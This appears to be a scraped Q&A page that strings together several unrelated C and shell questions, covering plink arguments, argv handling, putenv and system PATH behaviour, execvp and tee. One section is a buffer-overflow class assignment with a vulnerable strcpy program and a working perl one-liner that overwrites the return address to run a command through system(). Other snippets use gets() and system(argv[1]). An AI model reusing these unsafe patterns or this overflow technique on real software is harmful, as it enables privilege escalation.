plink user#10.220.60.xx -t '/home/user/test/testpgm'
I'm able to run the below program which resides on a Linux machine from a windows machine using the above plink cmd.
#include<stdio.h>
int main(int argc,char *argv[])
{
int i;
char buf[30];
printf("Test Pgm \n");
printf("No of Arguments=%d\n",argc);
printf("Enter a string:");
fflush(stdout);
gets(buf);
printf("Input str:%s \n",buf);
return 0;
}
gcc test.c -o testpgm
Question: How to pass command line arguments to this function?
I tried
plink user#10.220.60.xx -t '/home/user/test/testpgm arg1'
bash: /home/user/test/testpgm arg1: No such file or directory
The shell treats strings inside quotes as a single word, which means that plink tries to execute the program /home/user/test/testpgm arg1. Obviously this won't work.
What you have to do is very simple: Skip the quotes!
$ plink user#10.220.60.xx -t /home/user/test/testpgm arg1
I tried
plink user#10.220.60.xx /home/user/test/testpgm arg1
Works fine.
Related
I'm doing a buffer overflow assignment and I'm stuck on the syntax for this command:
$ ./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"' | touch test.txt)
We're expected to use this one liner instead of a shell. The return address is correct and it takes me to the correct place in the assembly, but when I run this, the functions execute as the standard user, instead of running as root.
From what I gather, the issue is either syntax or quotation marks.
How could I correct the one liner?
Source for Script
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
char arg1[60];
char arg2[60];
void func(char *s){
char buf[32];
strcpy(buf, s);
printf("you entered: %s\n", buf);
}
void secret(){
system(arg2);
}
int main(int argc, char *argv[]){
if(argc < 2){
printf("Usage: %s some_string\n", argv[0]);
return 2;
}
strcpy(arg1, argv[1]);
if (argc == 3) {
strcpy(arg2, argv[2]);
}
func(argv[1]);
return 0;
}
I think you the part that says | touch test.txt) is not needed.
./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"') "touch test.txt"
should work.
I am not sure why you are piping the output of the shell script to the touch command (I am assuming the buffer overflow you want to exploit is in the script, and it ends up somehow using the second argument as a parameter to a function).
As in terms of why it's being executed as normal user, in your scenario, your shell was running touch as a normal user. What I think you want to do is run your script as root (either by making it a setuid binary or just running the program with sudo, and make the script actually perform the call to system("touch ...");.
After some tinkering, and a bunch of help from the community, the resolution was to use:
./step4 `perl -e 'print "A" x 36 . "\x94\x84\x04\x08"'` "touch test.txt"
I checked the assembly in gdb, called the correct address for the secret function and by swapping the $() for back ticks, the attack executed as expected. Big thanks to Marco for the help on this one.
I'm trying to run a simple program from command prompt for educational prupose to demonstrate the parameter exchange between a c program and operating system. I got the following output.
I implemented the following code. Please ignore some of the printf outputs. They're written in German. I know I run the program with less parameter. The output should be a hint on program was run with less parameter instead.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
if(argc < 4)
printf("Das Programm wurde mit %d anstatt den notwendigen 4 Parametern "
"gestartet.", argc);
else {
int modus = atoi(argv[1]);
double niveau = atof(argv[2]);
char datei[13];
size_t strlcpy = strlcpy(datei, argv[3], (int)sizeof(datei) - 1);
printf("\n\nMAIN-Parameter");
printf("\n#Parameter:\t%d", argc);
printf("\nProgrammname:\t%s", argv[0]);
printf("\nModus:\t%d", modus);
printf("\nNiveau:\t%f", niveau);
printf("\nDatei:\t%s", datei);
}
return 0;
}
Appreciate your input.
Cheers
Install gcc and some other compiler tools into your cygwin:
C:\cygwin64>setup-x86_64.exe -q -P wget -P gcc-g++ -P make -P diffutils -P libmpfr-devel -P libgmp-devel -P libmpc-devel
Open a cygwin terminal. Compile your source:
$ gcc main.c -o main
Run your binary with the arguments:
$ ./main 1 2 date
This question already has answers here:
Difference between single and double quotes in Bash
(7 answers)
Closed 4 years ago.
This is a piece of code found on Internet
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[])
{
putenv("PATH=/nothinghere");
//setenv("PATH","/nothinghere");
system(argv[1]);
return 0;
}
if I do
$./a.out "ls"
sh: 1: ls: not found
Of course
But what if
$./a.out "echo $PATH"
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
It print the original $PATH !!
If we create a new shell then do the samethings
int main(int argc, char* argv[])
{
putenv("PATH=/nothinghere");
//setenv("PATH","/nothinghere");
system("/bin/sh");
return 0;
}
$./a.out
$ echo $PATH
/nothinghere
$ ls
/bin/sh: 2: ls: not found
Why?
Is it kind of problem about fork or the implementation of echo?
This is because you're using double quotes, telling your shell to replace $PATH with the value of the PATH variable before it even starts a.out.
The wrong value is thus being inserted not by the shell invoked by system(), but by the shell you're interactively typing commands at.
To fix it, change:
$ ./a.out "echo $PATH"
to:
$ ./a.out 'echo $PATH'
I am trying to run ls using system calls in C with more than one argument, for example -l -a. The arguments and their number is changing depending on the user input. The input is concatenated "-l" + "-a" == "-l -a". The code I'm using is:
execlp("ls","ls",arguments,NULL) //arguments = "-l -a"
The user input is from Terminal:
-l
-a
if you want to executes more than one argument , then you should use execvp() instead of execlp.
#include<stdio.h>
#include <unistd.h>
int main(int argc,char *argv[])
{
execvp(argv[1],argv+1);// argv+1 means whatever arguments after argv[1] it will take & executes it
return 0;
}
for e.g your input like that
xyz#xyz-PC:~$ ./a.out ps -el
I hope it helps.
Say I have the following program that simply outputs "Hello World":
//DEMO.c
#include<stdio.h>
int main()
{
printf("HELLO World");
}
Now I want to display it both to the screen and to a file output.txt.So I enter the following command in the command prompt(I use CodeBlocks on Windows XP and have configured it to work on command prompt as well):
demo.exe>>output.txt>>stdout
It doesn't work!!! Please tell me how to do it,ie how to output the same thing that I see on my screen(When i run the program),simultaneously to a text file?
You will need to download a tee command for Windows. tee is a UNIX/Linux command that copies the standard input to standard output and also outputs to a file. Then, you can do this:
demo.exe | tee output.txt
Here is one port of tee for Windows.
#include <stdio.h>
#define my_fprintf(fp,...) do{fprintf(fp, __VA_ARGS__);fprintf(stdout, __VA_ARGS__);}while(0)
int main(int argc, char **argv){
FILE *fp;
fp=fopen("output.txt","w");//or filename from argv[1]
my_fprintf(fp, "hello world by %s\n", argv[0]);
fclose(fp);
return 0;
}